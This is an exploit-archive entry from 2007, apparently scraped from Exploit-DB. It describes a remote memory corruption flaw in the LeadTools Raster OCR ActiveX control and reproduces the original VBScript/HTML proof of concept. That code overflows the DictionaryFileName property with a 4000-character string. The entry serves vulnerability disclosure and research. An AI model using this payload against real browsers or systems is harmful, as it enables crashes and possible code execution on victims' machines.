LeadTools Raster OCR Document Object Library Remote Memory corruption Exploit

vendor:

LeadTools Raster OCR Document Object Library

by:

shinnai

7.5

CVSS

HIGH

Remote Memory Corruption

CWE

Product Name: LeadTools Raster OCR Document Object Library

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows XP Professional SP2

2007

LeadTools Raster OCR Document Object Library Remote Memory corruption Exploit

This exploit targets the LeadTools Raster OCR Document Object Library (ltrdc14e.dll v. 14.5.0.44) and causes a remote memory corruption. By sending a specially crafted DictionaryFileName parameter to the library, an attacker can trigger the memory corruption and potentially execute arbitrary code on the target system. This vulnerability affects all software that uses this ocx.

Mitigation:

Apply the latest patches and updates provided by the vendor. Avoid opening untrusted files or visiting malicious websites.

Source

Exploit-DB raw data:

<pre>
<span style="font: 14pt Courier New;"><p align="center"><b>2007/05/26</b></p></span>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol">-----------------------------------------------------------------------------------------------------------
 <b>LeadTools Raster OCR Document Object Library (ltrdc14e.dll v. 14.5.0.44) Remote Memory corruption Exploit</b>
 url: http://www.leadtools.com/
 price: eheheh, take a look at thier site :)

 author: shinnai
 mail: shinnai[at]autistici[dot]org
 site: http://shinnai.altervista.org
 
 Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
 all software that use this ocx are vulnerable to this exploits.
-----------------------------------------------------------------------------------------------------------

<object classid='clsid:00140B30-B1BA-11CE-ABC6-F5B2E79D9E3F' id='test'></object>

<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">

<script language='vbscript'>
 Sub tryMe
  buff = String(4000, "A")
  
  test.DictionaryFileName = buff
 End Sub
</script>
</span></span>
</code></pre>

# milw0rm.com [2007-05-30]